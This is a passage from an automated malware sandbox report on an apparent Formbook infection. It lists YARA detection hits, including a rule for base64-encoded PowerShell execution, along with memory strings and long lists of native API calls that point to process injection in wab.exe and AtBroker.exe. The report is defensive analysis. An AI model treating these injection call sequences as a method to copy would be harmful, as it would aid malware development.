        Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
        Source: powershell.exe, 00000006.00000002.20347450981.0000025A23607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: amsi32_2316.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2814
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2838
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2814Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2838Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233334E0 NtCreateMutant,LdrInitializeThunk,12_2_233334E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332B90 NtFreeVirtualMemory,LdrInitializeThunk,12_2_23332B90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332BC0 NtQueryInformationToken,LdrInitializeThunk,12_2_23332BC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332A80 NtClose,LdrInitializeThunk,12_2_23332A80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332EB0 NtProtectVirtualMemory,LdrInitializeThunk,12_2_23332EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332D10 NtQuerySystemInformation,LdrInitializeThunk,12_2_23332D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23334260 NtSetContextThread,12_2_23334260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23334570 NtSuspendThread,12_2_23334570
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332B20 NtQueryInformationProcess,12_2_23332B20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332B10 NtAllocateVirtualMemory,12_2_23332B10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332B00 NtQueryValueKey,12_2_23332B00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332B80 NtCreateKey,12_2_23332B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332BE0 NtQueryVirtualMemory,12_2_23332BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332A10 NtWriteFile,12_2_23332A10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332AA0 NtQueryInformationFile,12_2_23332AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332AC0 NtEnumerateValueKey,12_2_23332AC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233329F0 NtReadFile,12_2_233329F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233329D0 NtWaitForSingleObject,12_2_233329D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233338D0 NtGetContextThread,12_2_233338D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332F30 NtOpenDirectoryObject,12_2_23332F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332F00 NtCreateFile,12_2_23332F00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332FB0 NtSetValueKey,12_2_23332FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332E00 NtQueueApcThread,12_2_23332E00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332E50 NtCreateSection,12_2_23332E50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332E80 NtCreateProcessEx,12_2_23332E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332ED0 NtResumeThread,12_2_23332ED0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332EC0 NtQuerySection,12_2_23332EC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332D50 NtWriteVirtualMemory,12_2_23332D50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332DA0 NtReadVirtualMemory,12_2_23332DA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332DC0 NtAdjustPrivilegesToken,12_2_23332DC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23333C30 NtOpenProcessToken,12_2_23333C30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332C30 NtMapViewOfSection,12_2_23332C30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332C20 NtSetInformationFile,12_2_23332C20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332C10 NtOpenProcess,12_2_23332C10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332C50 NtUnmapViewOfSection,12_2_23332C50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23333C90 NtOpenThread,12_2_23333C90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332CF0 NtDelayExecution,12_2_23332CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332CD0 NtEnumerateKey,12_2_23332CD0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E642B0 SleepEx,NtResumeThread,14_2_06E642B0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E64108 SleepEx,NtCreateSection,14_2_06E64108
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE34E0 NtCreateMutant,LdrInitializeThunk,15_2_04AE34E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE4570 NtSuspendThread,LdrInitializeThunk,15_2_04AE4570
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE4260 NtSetContextThread,LdrInitializeThunk,15_2_04AE4260
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2CF0 NtDelayExecution,LdrInitializeThunk,15_2_04AE2CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2C30 NtMapViewOfSection,LdrInitializeThunk,15_2_04AE2C30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2C50 NtUnmapViewOfSection,LdrInitializeThunk,15_2_04AE2C50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2DA0 NtReadVirtualMemory,LdrInitializeThunk,15_2_04AE2DA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2D10 NtQuerySystemInformation,LdrInitializeThunk,15_2_04AE2D10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2ED0 NtResumeThread,LdrInitializeThunk,15_2_04AE2ED0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2E00 NtQueueApcThread,LdrInitializeThunk,15_2_04AE2E00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2E50 NtCreateSection,LdrInitializeThunk,15_2_04AE2E50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2FB0 NtSetValueKey,LdrInitializeThunk,15_2_04AE2FB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2F00 NtCreateFile,LdrInitializeThunk,15_2_04AE2F00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE38D0 NtGetContextThread,LdrInitializeThunk,15_2_04AE38D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE29F0 NtReadFile,LdrInitializeThunk,15_2_04AE29F0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2A80 NtClose,LdrInitializeThunk,15_2_04AE2A80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2AC0 NtEnumerateValueKey,LdrInitializeThunk,15_2_04AE2AC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2A10 NtWriteFile,LdrInitializeThunk,15_2_04AE2A10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2B80 NtCreateKey,LdrInitializeThunk,15_2_04AE2B80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2B90 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04AE2B90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2BC0 NtQueryInformationToken,LdrInitializeThunk,15_2_04AE2BC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2B00 NtQueryValueKey,LdrInitializeThunk,15_2_04AE2B00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2B10 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04AE2B10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE3C90 NtOpenThread,15_2_04AE3C90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2CD0 NtEnumerateKey,15_2_04AE2CD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2C20 NtSetInformationFile,15_2_04AE2C20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE3C30 NtOpenProcessToken,15_2_04AE3C30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2C10 NtOpenProcess,15_2_04AE2C10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2DC0 NtAdjustPrivilegesToken,15_2_04AE2DC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2D50 NtWriteVirtualMemory,15_2_04AE2D50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2EB0 NtProtectVirtualMemory,15_2_04AE2EB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2E80 NtCreateProcessEx,15_2_04AE2E80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2EC0 NtQuerySection,15_2_04AE2EC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2F30 NtOpenDirectoryObject,15_2_04AE2F30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE29D0 NtWaitForSingleObject,15_2_04AE29D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2AA0 NtQueryInformationFile,15_2_04AE2AA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2BE0 NtQueryVirtualMemory,15_2_04AE2BE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AE2B20 NtQueryInformationProcess,15_2_04AE2B20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC8AD0 NtReadFile,15_2_02AC8AD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC8B90 NtDeleteFile,15_2_02AC8B90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC89A0 NtCreateFile,15_2_02AC89A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC8C10 NtClose,15_2_02AC8C10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02AC8D50 NtAllocateVirtualMemory,15_2_02AC8D50
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB2008B1A66_2_00007FFB2008B1A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFB2008BF526_2_00007FFB2008BF52
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C5867010_2_04C58670
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C58F4010_2_04C58F40
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C51CEF10_2_04C51CEF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C51D7A10_2_04C51D7A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C5B77A10_2_04C5B77A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04C5832810_2_04C58328
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BF33012_2_233BF330
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330E31012_2_2330E310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F138012_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232C224512_2_232C2245
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED2EC12_2_232ED2EC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339D13012_2_2339D130
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C010E12_2_233C010E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF11312_2_232EF113
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2334717A12_2_2334717A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B1E012_2_2331B1E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233051C012_2_233051C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AE07612_2_233AE076
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F00A012_2_232F00A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B70F112_2_233B70F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330B0D012_2_2330B0D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330276012_2_23302760
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330A76012_2_2330A760
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B675712_2_233B6757
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339D62C12_2_2339D62C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331C60012_2_2331C600
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332467012_2_23324670
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AD64612_2_233AD646
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330068012_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BF6F612_2_233BF6F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FC6E012_2_232FC6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233736EC12_2_233736EC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BA6C012_2_233BA6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CA52612_2_233CA526
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BF5C912_2_233BF5C9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B75C612_2_233B75C6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330044512_2_23300445
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BFB2E12_2_233BFB2E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300B1012_2_23300B10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23374BC012_2_23374BC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BCA1312_2_233BCA13
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BEA5B12_2_233BEA5B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331FAA012_2_2331FAA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BFA8912_2_233BFA89
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FE9A012_2_232FE9A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BE9A612_2_233BE9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232C99E812_2_232C99E8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233A083512_2_233A0835
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330380012_2_23303800
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330987012_2_23309870
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331B87012_2_2331B870
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E686812_2_232E6868
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BF87212_2_233BF872
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233798B212_2_233798B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331688212_2_23316882
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B78F312_2_233B78F3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233028C012_2_233028C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330CF0012_2_2330CF00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BFF6312_2_233BFF63
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BEFBF12_2_233BEFBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23306FE012_2_23306FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B1FC612_2_233B1FC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233A0E6D12_2_233A0E6D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23320E5012_2_23320E50
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23301EB212_2_23301EB2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B0EAD12_2_233B0EAD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F2EE812_2_232F2EE8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B9ED212_2_233B9ED2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BFD2712_2_233BFD27
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FAD0012_2_232FAD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300D6912_2_23300D69
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B7D4C12_2_233B7D4C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312DB012_2_23312DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339FDF412_2_2339FDF4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23309DD012_2_23309DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330AC2012_2_2330AC20
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F0C1212_2_232F0C12
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23303C6012_2_23303C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B6C6912_2_233B6C69
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BEC6012_2_233BEC60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AEC4C12_2_233AEC4C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23399C9812_2_23399C98
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331FCE012_2_2331FCE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CACEB12_2_233CACEB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23318CDF12_2_23318CDF
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6CBD014_2_06E6CBD0
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6D0AF14_2_06E6D0AF
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6CD0F14_2_06E6CD0F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 14_2_06E6C11414_2_06E6C114
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB044515_2_04AB0445
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B675C615_2_04B675C6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6F5C915_2_04B6F5C9
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B7A52615_2_04B7A526
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB068015_2_04AB0680
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6F6F615_2_04B6F6F6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AAC6E015_2_04AAC6E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B236EC15_2_04B236EC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6A6C015_2_04B6A6C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B4D62C15_2_04B4D62C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ACC60015_2_04ACC600
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AD467015_2_04AD4670
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B5D64615_2_04B5D646
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB276015_2_04AB2760
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ABA76015_2_04ABA760
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6675715_2_04B66757
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AA00A015_2_04AA00A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B670F115_2_04B670F1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ABB0D015_2_04ABB0D0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B5E07615_2_04B5E076
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ACB1E015_2_04ACB1E0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB51C015_2_04AB51C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B4D13015_2_04B4D130
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B7010E15_2_04B7010E
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04A9F11315_2_04A9F113
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AF717A15_2_04AF717A
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04A9D2EC15_2_04A9D2EC
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6124C15_2_04B6124C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AA138015_2_04AA1380
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6F33015_2_04B6F330
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ABE31015_2_04ABE310
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B49C9815_2_04B49C98
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ACFCE015_2_04ACFCE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B7ACEB15_2_04B7ACEB
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AC8CDF15_2_04AC8CDF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ABAC2015_2_04ABAC20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AA0C1215_2_04AA0C12
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB3C6015_2_04AB3C60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6EC6015_2_04B6EC60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B66C6915_2_04B66C69
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B5EC4C15_2_04B5EC4C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AC2DB015_2_04AC2DB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B4FDF415_2_04B4FDF4
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB9DD015_2_04AB9DD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6FD2715_2_04B6FD27
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AAAD0015_2_04AAAD00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB0D6915_2_04AB0D69
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B67D4C15_2_04B67D4C
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB1EB215_2_04AB1EB2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B60EAD15_2_04B60EAD
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AA2EE815_2_04AA2EE8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B69ED215_2_04B69ED2
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B50E6D15_2_04B50E6D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AD0E5015_2_04AD0E50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B6EFBF15_2_04B6EFBF
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04AB6FE015_2_04AB6FE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04B61FC615_2_04B61FC6
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_04ABCF0015_2_04ABCF00
